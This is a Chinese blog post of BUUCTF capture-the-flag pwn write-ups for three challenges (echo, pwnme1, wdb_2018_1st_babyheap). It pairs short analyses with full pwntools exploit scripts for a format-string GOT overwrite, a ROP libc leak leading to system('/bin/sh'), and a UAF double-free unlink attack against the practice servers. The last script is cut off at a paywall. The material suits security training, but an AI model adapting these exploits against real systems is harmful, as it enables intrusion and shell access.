BUUCTF 2021-10-4 Pwn

最新推荐文章于 2022-03-01 16:46:01 发布
最新推荐文章于 2022-03-01 16:46:01 发布
阅读量400 收藏
点赞数
分类专栏: BUUCTF Pwn 文章标签: linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56897090/article/details/120605563
版权

文章目录

保持手感

echo

分析

[*] '/root/echo'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

经典的echo字符串格式化漏洞题:
Pasted image 20211004155928.png

偏移:7
改GOT

EXP

#coding=utf-8
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level="debug"
context.arch="i386"

isLocal=0

filename="/root/echo"
if  isLocal:
    p=process(filename)#

    pause()
else :
    p=remote("node4.buuoj.cn",26031)

elf=ELF(filename)
libc=ELF("./x86/libc-2.23_buuctf.so")


printf_got=elf.got["printf"]
system_addr=elf.plt["system"]
payload=fmtstr_payload(7,{
   printf_got:system_addr})
p.sendline(payload)

p.interactive()

Pwnme1

分析

关键栈溢出漏洞点(getfruit函数):
Pasted image 20211004160010.png

解法同pwnme2,栈溢出泄露libc方法

注意的点:

  • 如果遇到泄露的got会崩溃问题,不妨换一个函数名,多试试

EXP

整体思路:

  1. 栈溢出ROP泄露libc
  2. 栈溢出ROP返回到任意地址getshell
from pwn import *;
context.log_level="debug"
context.arch="i386"
context.os="linux"

isLocal=0
libc=ELF("./x86/libc-2.23_buuctf.so")#ELF("/lib/i386-linux-gnu/libc-2.23.so")#

if  isLocal:
    p=process("/root/pwnme1")#

    pause()
else :
    p=remote("node4.buuoj.cn",27876)


elf=ELF("/root/pwnme1")
backdoor=0x804869D#0x8048677#
p.sendlineafter("Exit","5")

jmpasm=asm("jmp esp;")
shellcode=asm(shellcraft.sh())
flag_addr=0x08048938
modes_addr=0x08048931
pop_eax=0x08048184
xchg_eax_edx=0x08048189

main_addr=0x08048624#elf.sym["_start"]



printf_plt=elf.plt["puts"]
printf_got=elf.got["puts"]
payload  =b"a"*(0xA4+4)+p32(printf_plt)+p32(main_addr)+p32(printf_got)

p.sendlineafter("input",payload)#一个个来不急 慢慢走 一步步来 gets遇到\n才会返回

p.recvuntil("...\n")
leak=u32(p.recv(4))

log.success(hex(leak))

libc_base=leak-libc.sym["puts"]
system_addr=libc_base+libc.sym["system"]

sh_addr=0x804831D
payload  =b"a"*(0xA4+4)+p32(system_addr)+p32(main_addr)+p32(sh_addr)
#注意修复ROP的返回地址,无论是x86还是x64,执行system参数可直接传字符串地址

p.sendlineafter("input",payload)





p.interactive()

wdb_2018_1st_babyheap

分析

保护情况:无PIE,got不可写

[*] '/root/wdb_2018_1st_babyheap'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

关键漏洞点(UAF):
Pasted image 20211004164748.png

根据大佬WP提示,可以使用

  1. unlink
  2. __IO_File结构体的劫持

分析发现:

  1. free中存在uaf漏洞,同时有dump功能
  2. unlink后泄露libc地址

unlink_fakechunk的条件

  1. fake chunk header
  2. fake fd bk
  3. fake next header(覆写到需要释放的堆块块头)

笔记
libc-xx.so文件才有symbols

EXP

Unlink解法:
主要的知识点:

本题不是使用通常的堆溢出Unlink,而是用UAF后double free list的方法,修改fastbin地址,创建一个合法的fake chunk导致Unlink

整体思路:

  1. 构造unlink fake header
  2. 泄露heap地址
  3. DoubleFreeList任意创建堆地址到指定位置为实现unlink准备
  4. 构造fakechunk实现unlink
  5. 泄露unsorted bin地址,计算libc基地址
  6. unlink后实现的任意地址写
#coding=utf-8
from pwn import *
context.log_level="debug"
context.arch="amd64"

isLocal=0

filename="/root/wdb_2018_1st_babyheap"
if  isLocal:
    libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
    p=process(filename)#,env={"LD_PRELOAD" : "/lib/x86_64-linux-gnu/ld-2.23.so"}

else :
    p=remote("node4.buuoj.cn",26666)
    libc=ELF("./x64/libc-2.23_buuctf.so")

elf=ELF(filename)

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
def bk(addr):
    gdb.attach(p,"b *"+str(hex(addr)))
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{
   {print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr)))
    pause()


def malloc(idx,content):
    ru("Choice:")
    sl('1')
    ru("Index:")
    sl(str(idx))
    ru("Content:")
    sd(content)


def edit(idx,content):
    ru("Choice:")
    sl('2')
    ru("Index:")
    sl(str(idx))
    ru("Content:")
    sd(content)
def dump(index):
    ru("Choice:")
    sl('3')
    ru("Index:")
    sl(str(index))
def free(index):
    ru("Choice:")
    sl('4')
    ru("Index:")
    sl(str(index))

ptr=0x0000000000602060
fd=ptr-0x18
bk=ptr-0x10
#1.构造unlink fake header
malloc(0,p64(0x31)*4)#fixheader
malloc(1,p64(0x31)*4)
malloc(2,p64(0x31)*4)
malloc(3,p64(0x31)*4)
malloc(4,b"/bin/sh\x00\n")

free(1)
free(0)

#2.泄露chunk1地址
dump(0)#leak chunk1 addr

leak_heap_addr=u64(p.recv(4).ljust(8,b"\x00"))#0xnnnn30
log.info("leak heap addr=>{}".format(hex(leak_heap_addr)))

#3.DoubleFreeList任意创建堆地址到指定位置为实现unlink准备
free(1)#double free list 实际是一个任意地址写的作用(a<=>a),修改了a,就修改了申请堆地址.(实现堆溢出堆叠写)


#4.构造fakechunk实现unlink
malloc(5,p64(leak_heap_addr-0x20)+b"\n")#0xnnnn10(DoubleFree后修改了fastbin链表的一个地址)
malloc(6,b"a\n")
malloc(7,b"a\n")#cycle
payload = p64(fd)+p64(bk)+p64
最低0.47元/天 解锁文章
Ch1lkat
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub[技能树]-----House of orange
KaliLinux_V的博客
02-10 190
House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。
wdb_2018_1st_babyheap
z1r0的博客
03-24 530
wdb_2018_1st_babyheap 查看保护 一个uaf漏洞这个程序内申请的堆块大小是固定的0x20。edit有限制 攻击思路:这里有两种攻击方法,一种是unlink,因为pie没开。还有一种是FSOP。 这里笔者unlink打不通,然后就采取了FSOP 首先肯定是泄露libc。因为FSOP需要_IO_list_all这个地方。 泄露libc一般是unstortedbin来泄露,所以这里想办法给出一个0x90以上的堆块 因为有uaf,再加上2.23下的libc.so,所以可以先泄露出heap_a
fast_attack+unlink(wdb_2018_1st_babyheap)
csdn546229768的博客
03-01 311
题目:wdb_2018_1st_babyheap 保护 分析 alloc函数: free函数: edit函数: 这题我干掉了睡眠函数,idapython脚本如下: addres_start = 0x400CE3 addres_end = 0x400CED for i in range(addres_start,addres_end): ida_bytes.patch_byte(i,0x90) 这题的的漏洞还是挺多的uaf、off-by-null、double free但是off-by-nu
house of orange学习报告
qq_35467337的博客
03-08 804
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
攻防世界PWN之bufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 952
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
解析c中stdout与stderr容易忽视的一些细节
09-05
本篇文章是对在c语言中stdout与stderr容易忽视的一些细节进行了详细的分析介绍,需要的朋友参考下
RCTF2020_nowrite(libc_start_main的妙用+盲注)
seaaseesa的博客
06-11 1373
RCTF2020_nowrite(libc_start_main的妙用+盲注) 首先,检查一下程序的保护机制 检测一下沙箱,发现仅能进行open、read、exit操作,write操作都不行。 然后,我们用IDA分析一下,是一个及其简短的栈溢出程序 程序中没有输出,并且write也禁用了,也没有open函数,execve也禁用了,FULL RELRO也不能进行ret2dl,那么本题只能进行盲注,我们还需要构造出一个open系统调用。但是几乎没有可用的地方可以给我们构造。 找到一条有用的
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6549
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
BUUCTF 每日打卡 2021-7-17
weixin_52446095的博客
07-17 568
引言 无 [INSHack2019]Yet Another RSA Challenge - Part 1 加密代码如下: import subprocess p = subprocess.check_output('openssl prime -generate -bits 2048 -hex') q = subprocess.check_output('openssl prime -generate -bits 2048 -hex') flag = int('INSA{REDACTED}'.encode(
Blind_pwn之格式化字符串
蚁景网安学院
07-07 993
可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给出可交互的 ip 地址与端口,不给出对应的 bin...
网鼎杯 babyheap
MozhuCY的博客
09-21 880
网鼎杯第一场 程序功能:新建,编辑,打印,free free处没有置空指针,导致可以uaf malloc每次都是0x20的fastbin,编辑功能可以使用3次 自写了readn函数,没有溢出点 edit可以修改free后堆块的bk,fd 1 2 3 4 5 Arch: amd64-64-little RELRO: Full RELRO S...
BUUCTF 每日打卡 2021-4-3
weixin_52446095的博客
04-03 515
引言 今天的虎符CTF全队四个人只有我没有做出题来,感觉很对不起队友[叹气] 总共两道 crypto ,第一道 cubic 本质上是一道椭圆曲线加密问题,然而这是我的知识盲区 第二题看到 .sage 文件,点开挺长的代码,还涉及位运算,我直接懒得看了 最后第一题68人解出来,第二题仅有13题解出来 楞看了一下午的椭圆曲线加密,把加密原理大致看懂了(怎么破解还没看) 等 wp 出来之后我分两天写一下吧 凯撒?替换?呵呵 密文:MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCO
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值